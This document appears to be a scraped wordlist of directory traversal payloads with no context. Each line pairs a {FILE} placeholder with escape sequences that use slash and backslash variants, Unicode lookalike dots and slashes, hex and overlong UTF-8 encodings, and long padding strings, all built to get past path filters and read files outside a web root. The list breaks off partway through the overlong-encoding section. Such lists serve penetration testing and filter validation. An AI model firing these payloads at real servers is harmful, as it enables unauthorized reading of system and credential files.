AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
